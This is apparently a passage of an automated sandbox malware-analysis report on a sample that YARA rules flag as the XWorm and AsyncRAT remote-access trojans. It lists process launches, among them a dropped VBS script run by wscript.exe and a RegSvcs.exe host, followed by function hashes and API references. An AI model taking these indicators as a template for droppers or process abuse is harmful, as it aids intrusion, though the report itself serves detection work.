Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xe30000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:50:59
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
Imagebase:	0x7ff670170000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:51:07
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
Imagebase:	0x7ff670170000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

Reset < >

Analysis Process: powershell.exePID: 4652, Parent PID: 7828COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFB11171028 Relevance: 5.8, Strings: 4, Instructions: 822
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3O_I, xrefs: 00007FFB111713A4
2O_I, xrefs: 00007FFB111714A4
5O_I, xrefs: 00007FFB111711A4
6O_I, xrefs: 00007FFB111710A4

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID: 2O_I$3O_I$5O_I$6O_I
API String ID: 0-2206373260
Opcode ID: 1fd4ef465f1da9ed4e779461fffa259ce78f6fd0931aecf3a782854bcafd0c57
Instruction ID: ab7b12bdc67869d6d054babe237ee07fc5d037d9b89171e5c87e358b988f78ee
Opcode Fuzzy Hash: 1fd4ef465f1da9ed4e779461fffa259ce78f6fd0931aecf3a782854bcafd0c57
Instruction Fuzzy Hash: 6A4204D3A0DFC50BF75586BC9815269AF97FF96320B9800FAD1C98B2CBE8189D1583D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11171010 Relevance: 5.8, Strings: 4, Instructions: 792
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3O_I, xrefs: 00007FFB111713A4
2O_I, xrefs: 00007FFB111714A4
5O_I, xrefs: 00007FFB111711A4
6O_I, xrefs: 00007FFB111710A4

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID: 2O_I$3O_I$5O_I$6O_I
API String ID: 0-2206373260
Opcode ID: d024d526fdfa889c927913b9d35c2ba099f5f61cbcb8958439bad50b9e8b27b7
Instruction ID: 236e32edd02b0cd127f2f80b0904973646e63fa71c84fcc10754031c27410358
Opcode Fuzzy Hash: d024d526fdfa889c927913b9d35c2ba099f5f61cbcb8958439bad50b9e8b27b7
Instruction Fuzzy Hash: F34204D3A0DFC50BF75586BC9816269AF97FF92320B9800FAD1C98B2CBE9149D1583D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11171030 Relevance: 5.8, Strings: 4, Instructions: 779
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3O_I, xrefs: 00007FFB111713A4
2O_I, xrefs: 00007FFB111714A4
5O_I, xrefs: 00007FFB111711A4
6O_I, xrefs: 00007FFB111710A4

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID: 2O_I$3O_I$5O_I$6O_I
API String ID: 0-2206373260
Opcode ID: aaf5abd65370ddadb752e75486f210f1d3a9b66c050d40ea1c3149748d548d68
Instruction ID: 0688658d3f3953daba3a32091c74bffced43bcaabc026ee27769da60fc5efd14
Opcode Fuzzy Hash: aaf5abd65370ddadb752e75486f210f1d3a9b66c050d40ea1c3149748d548d68
Instruction Fuzzy Hash: C44204D3A0DFC50BF75586BC9816269AF97FF96320B9800FAD1C98B2CBE8149D1583D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11181FCB Relevance: 3.4, Strings: 1, Instructions: 2138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+KN_^, xrefs: 00007FFB111824C0

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID: +KN_^
API String ID: 0-2118880205
Opcode ID: fbd2fad8e494e0a45edcb5effdd0781a7e60cbd56845d4cb2cfb3a3197765194
Instruction ID: 45698a203fe2a16652d0dd367421533b845615a276eff5e8a98f23aa80c154b9
Opcode Fuzzy Hash: fbd2fad8e494e0a45edcb5effdd0781a7e60cbd56845d4cb2cfb3a3197765194
Instruction Fuzzy Hash: 2D03FDB0A18A598FEB94EB2CC855BA977F2FF59304F1041EAD00DD7292CA35AD90CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11171FCA Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed7ae8b8857215d930bef4ca3de1f931517a60a8d263f05001cd6e49f7bdb1e
Instruction ID: 8b97ac405a2e1dd0bf9c5301fea4a683dc77f0873b4450b8bae8f9b290df59ac
Opcode Fuzzy Hash: 5ed7ae8b8857215d930bef4ca3de1f931517a60a8d263f05001cd6e49f7bdb1e
Instruction Fuzzy Hash: EB4154B290CA4C4FF714DB28D8057E9BBE5EF96320F04027FD049C3292EB64A4568B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11177C21 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 00007FFB11177CC7

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cfe8e87ee08b71ec7b8d6dce14b6d8456b8f617327b9de6c34cd0546dd653d34
Instruction ID: e481a68de7ea623ebe6e3eec34297f3f27abe26848de953cec14879bcae847ec
Opcode Fuzzy Hash: cfe8e87ee08b71ec7b8d6dce14b6d8456b8f617327b9de6c34cd0546dd653d34
Instruction Fuzzy Hash: 6D31D27190CE4D8FDB59DB68C8486E9BBF1EF5A321F04426FD049D3252CB60A815CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11415C23 Relevance: 1.5, Strings: 1, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E, xrefs: 00007FFB11415CAC

Memory Dump Source

Source File: 00000005.00000002.2435241136.00007FFB11410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11410000_powershell.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: aa666c1bce7ae68c88aeb18f1081f451bc7dd30b4c78f371faa037d4a219974a
Instruction ID: e6a969a2fb86056817e643d6d0ff2e4d3a9ff306b179c77bf56fb55aa6725e6b
Opcode Fuzzy Hash: aa666c1bce7ae68c88aeb18f1081f451bc7dd30b4c78f371faa037d4a219974a
Instruction Fuzzy Hash: F7A1E371E189194FDB94EB28C859BAA77A2FF99340F5041F9D00ED7296CF34AD418F41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB117C0640 Relevance: 1.5, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`>wm, xrefs: 00007FFB117C0CA9

Memory Dump Source

Source File: 00000005.00000002.2453686272.00007FFB117C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB117C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb117c0000_powershell.jbxd

Similarity

API ID:
String ID: `>wm
API String ID: 0-1743393361
Opcode ID: 24be347e8171a875a602f98ab4e897002269ae6f38d025f24f7e72dcfa656847
Instruction ID: 8a87262df8c0920cff706d2af229c39c0af5b88bd75d7a6030563ff1d71c0dd5
Opcode Fuzzy Hash: 24be347e8171a875a602f98ab4e897002269ae6f38d025f24f7e72dcfa656847
Instruction Fuzzy Hash: 6B61D1E6B1CE4A4BEB9A9A3C985567676C3EF9A320B144079D08DC33D7DD24EC0687C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB115778E3 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e60b12721963b9fb6d9ce76a8a1dcd610b6921e2381ea589f2968a0d8063bc
Instruction ID: 794cf702f61f7b6d34f51610c5e20f0d483f1a4af93252df970ddf4e7439e4ed
Opcode Fuzzy Hash: 76e60b12721963b9fb6d9ce76a8a1dcd610b6921e2381ea589f2968a0d8063bc
Instruction Fuzzy Hash: 05A1A4B1A18D5D8FEB94EB68D855ABCB7E2FF99310F4400B9D04DD72A2CE25AC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB1157890B Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb99916d708c3c62e6e96fcbb1aaa6a0936406fbd2545fd3206dbe981d4dc8f1
Instruction ID: 64d1380974cd165eaf02cd4ec3ec488f2ac21bd152002a0c7a7cd886afa2ce86
Opcode Fuzzy Hash: fb99916d708c3c62e6e96fcbb1aaa6a0936406fbd2545fd3206dbe981d4dc8f1
Instruction Fuzzy Hash: 78219171908A1C8FDB58DF69C849BFABBE1FF65321F04422FD009D3251DB70A4568B91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11578860 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dad6fe0308f2a419205f1107c69a836faecacd7bd9eb93736d975fac563b8ed
Instruction ID: 19859f12ffae4d82c2dda06334e7b0fb12b3d044771938a1cf951e57a50a1fa3
Opcode Fuzzy Hash: 8dad6fe0308f2a419205f1107c69a836faecacd7bd9eb93736d975fac563b8ed
Instruction Fuzzy Hash: DB115260A18E170AFFACA679F4167B922C6EF54365F8404BAD80DC66E2DD1DDCC28351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB115788FD Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ad9c87d5fcdee96b0e3e505e1c5131ca0b20653a1fbaf0aed349e849f77139
Instruction ID: bf90f332774b6b8bbd9b300bc390ae6504f691b9ff1c896a4805437eba8480f5
Opcode Fuzzy Hash: 76ad9c87d5fcdee96b0e3e505e1c5131ca0b20653a1fbaf0aed349e849f77139
Instruction Fuzzy Hash: 59119A7190CB19CFDB55CF69D485BE9BBE0FF25320F0482AAC049C7552C764E4568B92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB115743ED Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7afb220bf9506d89fea0d224bad6f052e890d58149f96decaa35abf12f3a9a1f
Instruction ID: 88c92275cf0b4126d8a175cf4c9e21548acb45452462915334e26752af4ca337
Opcode Fuzzy Hash: 7afb220bf9506d89fea0d224bad6f052e890d58149f96decaa35abf12f3a9a1f
Instruction Fuzzy Hash: 74E0DF3145978C9FCB439B30E4110E27F34EE43324B5601CBF4888B053E7318A6ACB82

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFB115C0180 Relevance: 2.6, Strings: 1, Instructions: 1389COMMON

Download Yara Rule

Strings

r\_H, xrefs: 00007FFB115C043F

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID: r\_H
API String ID: 0-3237013734
Opcode ID: 0cb24c67f15b8b4ecb3307ec602fa7ef906e2b1ed56d9477273beb055c1786c0
Instruction ID: 1231c9f294daeea449e0d9c9ace14be53ab7fd70ae9c9d43e90e4c437d033555
Opcode Fuzzy Hash: 0cb24c67f15b8b4ecb3307ec602fa7ef906e2b1ed56d9477273beb055c1786c0
Instruction Fuzzy Hash: 4A92E36160DBC60FE75A5B3888242797FE6EF87210B1905FFD4CAC71E3D928AD458392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11586C55 Relevance: 1.9, Instructions: 1900COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b280f88c3eae770704dc87ef1ee1b1fb09af26468783062ccaca440d75ace7e5
Instruction ID: b167e7dc7dba75246d4e09819474c8b74485da8b12ce0d3522d1f6c8a4c059e3
Opcode Fuzzy Hash: b280f88c3eae770704dc87ef1ee1b1fb09af26468783062ccaca440d75ace7e5
Instruction Fuzzy Hash: E4D27170A28B498FD798EF38C00626AB7D3EF89315F5185BED04DC72A6DE35D9528B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB1117F0A5 Relevance: 1.6, Strings: 1, Instructions: 379COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFB1117F1DC

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: d3c9f8f35ca1f5c669980e7e43df5b2bfa7c38710020b410533f60df53920f12
Instruction ID: 8a8cbb83d714c7a808e3a09f2668bdcc384fc1f3f59977dd72177ec532152686
Opcode Fuzzy Hash: d3c9f8f35ca1f5c669980e7e43df5b2bfa7c38710020b410533f60df53920f12
Instruction Fuzzy Hash: 5DC10D93A1DE860FF355A77CE8112AABB92EF86360B5400BBD18DC73D7DD14A90683D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB1118739E Relevance: 1.4, Instructions: 1364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d86a885afe0b1887f966931566d32864da8bd002b00910ed588de6984ef90c
Instruction ID: fd8df81d178e28ad916737c406f1a34819431f7e3eb8e55436aa0fee74310f8f
Opcode Fuzzy Hash: e1d86a885afe0b1887f966931566d32864da8bd002b00910ed588de6984ef90c
Instruction Fuzzy Hash: 1292C392B1CE464FF399AB7CC8A5264A6C3EF9B750F5841BAE04DC72C3CD25AC514392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11180C0F Relevance: 1.3, Instructions: 1323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0a717fdffaa59768f2f2400e7851df5f8fc6bb9dcba14dbcf22487600e16a5
Instruction ID: 24d9b614f525a9919193527d41f532eff41277fbdfc05b0b0e06944c17c1ec4b
Opcode Fuzzy Hash: de0a717fdffaa59768f2f2400e7851df5f8fc6bb9dcba14dbcf22487600e16a5
Instruction Fuzzy Hash: 9EA263B0A18A498FE795EB7CC850795B7A1EF8B344F6441EAD00DCB693CE35AC41CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11585CBD Relevance: 1.2, Instructions: 1194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78b18d24145fd2bd3fef3aaca79ad9204da5aa74d531c1c44aa96262e25746c
Instruction ID: 5fb2517c7705ee3ceb9e19fe6e21514cac6ff4aac6e51aa5289d04770862edd4
Opcode Fuzzy Hash: c78b18d24145fd2bd3fef3aaca79ad9204da5aa74d531c1c44aa96262e25746c
Instruction Fuzzy Hash: 3E72B370B28B458FD758EB3CC016269B7D3EF89325B5085BED04EC72A2DE39D9528B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB1157DBB2 Relevance: 1.0, Instructions: 1049COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be883d7c5ff9c3ac8ffe8ff7582388839c8c0fe5e7afc8e1f950a6e5cf0cf126
Instruction ID: 473bb9f14cda0a481a3439ee4469fa87a816dc6f7b127bb4392a6a8a7530dfbf
Opcode Fuzzy Hash: be883d7c5ff9c3ac8ffe8ff7582388839c8c0fe5e7afc8e1f950a6e5cf0cf126
Instruction Fuzzy Hash: DC62A370A28B494FD798EB38C00226AB7D3FF89325F5486BED04EC7692DE35D9418B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB1157A8C7 Relevance: .9, Instructions: 917COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a99303f4edb7b2da9b22fb0482b366b107353713dc33c595da1f4fc63ccf93
Instruction ID: 7458734ed77fb55a3f8d7c54606cd6781dc94adf72754eab5ef4d249e2a68e93
Opcode Fuzzy Hash: f2a99303f4edb7b2da9b22fb0482b366b107353713dc33c595da1f4fc63ccf93
Instruction Fuzzy Hash: 695217B1A1CB854FD785DB3C8411265BBE3FF8A314B554AFEC08EC7293DA359A468701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11186A83 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2423481570.00007FFB11170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ff339306f606fa05bf61f1ae6fdc7d583a8f297cb8999e9585773b9299a20bc
Instruction ID: d1ba4dbb0d0c5749b774656e70e91f43d3445c86653d71a0f96d187ae5588224
Opcode Fuzzy Hash: 0ff339306f606fa05bf61f1ae6fdc7d583a8f297cb8999e9585773b9299a20bc
Instruction Fuzzy Hash: EEF1C391B2CE4A4FF399AB7CC8A12A4B6C2EF9B740B5441FAE04DCB2D3CD25AC444355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11577D7D Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a5058da23c533cc9b104171367bec44ace759ddbcc88aff287028462a017c80
Instruction ID: aeb1ed47abe947bc361aa85d84a36dbc3a0482cd235487fe977d7aefb9b83cd0
Opcode Fuzzy Hash: 6a5058da23c533cc9b104171367bec44ace759ddbcc88aff287028462a017c80
Instruction Fuzzy Hash: B4E1C270A18B498FD798EB3CC015266B7D3FF89325B6486BED04DC72A2DE35D9428B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB1158803D Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c45e000421c3e0a8fcfff1d2851d7320a89f654f9a1b9b4be973f6f13670cc
Instruction ID: d1d61df1d2585a8def2ffefa359d06eec6b8e63d697fb0ef008cff893385a2ea
Opcode Fuzzy Hash: c2c45e000421c3e0a8fcfff1d2851d7320a89f654f9a1b9b4be973f6f13670cc
Instruction Fuzzy Hash: 3D91A470B28A054FD798EB38C011269B6D7FFC9325F54867DD04EC3296DE39D9528701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB117D5459 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2453686272.00007FFB117C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB117C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb117c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29799ce9366001e107e03c388c319f5da95b05874d8c607e7b3dd69e5d982dba
Instruction ID: 0a4ab3765b6f06b43706c41525c7eaf6ca61457b0c30e439b558af40a5bb9b3d
Opcode Fuzzy Hash: 29799ce9366001e107e03c388c319f5da95b05874d8c607e7b3dd69e5d982dba
Instruction Fuzzy Hash: 4C7158B1A0DE5A4BEB99967CA4551B977E3EF89324B1401BFD08EC33C3DD19AC468381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB115805A9 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca48fa4d9b239b220b9a8e035ff809e56bc4c1a677df630ef8bbcb8a23dc8cc
Instruction ID: 481f98fb70b2e9b0fc140bbf03dfb0c4ee5dc689a8cc59827ccb2d3d873462b0
Opcode Fuzzy Hash: fca48fa4d9b239b220b9a8e035ff809e56bc4c1a677df630ef8bbcb8a23dc8cc
Instruction Fuzzy Hash: 50811571A0CF894FE359DB79C8942657BE2FF95314F2841BED04EC72A2CA25AC46C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB11576259 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2441715757.00007FFB11570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffb11570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 727b00b8b4f6f9e4384f68af5140dfa020c2db758b940ed7de79887a90d9ac88
Instruction ID: 56fd59585dcd6ca6837939d5c69a4e751b00d54c8a9fa0ed7fdd1fd70ee3042a
Opcode Fuzzy Hash: 727b00b8b4f6f9e4384f68af5140dfa020c2db758b940ed7de79887a90d9ac88
Instruction Fuzzy Hash: 3451E77062CB444FE76DDB3CC425225B7E2EF8A31971186BEC08AC72E2DE359841C715

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 5416, Parent PID: 8024COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	0

Executed Functions

Function 0163AE18 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163AEA7

Memory Dump Source

Source File: 00000010.00000002.2607816931.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1630000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 96cba0ad4e8df2c7f5058ac93203bd77ce2c381cceee47368d307319737325f9
Instruction ID: bbdc0865f5568981b2e07d03afbe86160390527d1f5e4bc6238935112801e403
Opcode Fuzzy Hash: 96cba0ad4e8df2c7f5058ac93203bd77ce2c381cceee47368d307319737325f9
Instruction Fuzzy Hash: 6C21E4B5901249DFDB10CFAAD984ADEBFF9EB48320F14841AE954A7350D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0163AE20 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163AEA7

Memory Dump Source

Source File: 00000010.00000002.2607816931.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1630000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f46e22a4a3361d8fd1eaed73c23eeb85c2be55f5cc398a31ba6dac567a899c65
Instruction ID: 81256bb4a4225acf6cd9477726c02fa429341abc75e3cad8209760170cd13534
Opcode Fuzzy Hash: f46e22a4a3361d8fd1eaed73c23eeb85c2be55f5cc398a31ba6dac567a899c65
Instruction Fuzzy Hash: 7C21F5B5D00209DFDB10CF9AD984ADEBFF4EB48310F14841AE954A3350D374A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01635AC0 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01635B43

Memory Dump Source

Source File: 00000010.00000002.2607816931.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false

Joe Sandbox IDA Plugin

